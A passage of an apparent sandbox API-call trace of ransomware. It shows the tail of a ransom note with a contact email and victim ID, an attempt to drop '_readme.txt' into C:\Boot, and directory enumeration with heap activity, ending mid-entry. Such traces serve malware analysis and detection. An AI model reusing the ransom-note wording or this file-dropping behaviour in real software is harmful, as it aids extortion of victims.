address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.712] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.712] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.712] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.712] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x35246c20, ftLastAccessTime.dwHighDateTime=0x1d8a73e, ftLastWriteTime.dwLowDateTime=0x9219e170, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0179.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9212bd50, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0179.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0179.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0179.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0179.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0179.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad77e8 [0179.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0179.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.714] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0179.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0179.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0179.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0179.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.715] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0179.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0179.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0179.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7860 [0179.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0179.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0179.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.717] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0179.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0179.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7860 | out: hHeap=0x2c0000) returned 1 [0179.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0179.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.719] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0179.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0179.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7860 [0179.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0179.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78d8 [0179.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0179.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0179.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7888 | out: hHeap=0x2c0000) returned 1 [0179.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0179.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0179.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.722] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0179.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.723] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0179.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7978 [0179.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7860 | out: hHeap=0x2c0000) returned 1 [0179.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78d8 | out: hHeap=0x2c0000) returned 1 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7900 | out: hHeap=0x2c0000) returned 1 [0179.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0179.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0179.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.727] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.727] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0179.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.728] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0179.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29f16c8 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78d8 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7860 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79c8 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79f0 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a68 [0179.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a90 [0179.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7888 | out: hHeap=0x2c0000) returned 1 [0179.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0179.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0179.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0179.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7978 | out: hHeap=0x2c0000) returned 1 [0179.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7900 | out: hHeap=0x2c0000) returned 1 [0179.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0179.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0179.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.732] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.733] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.734] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0179.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, 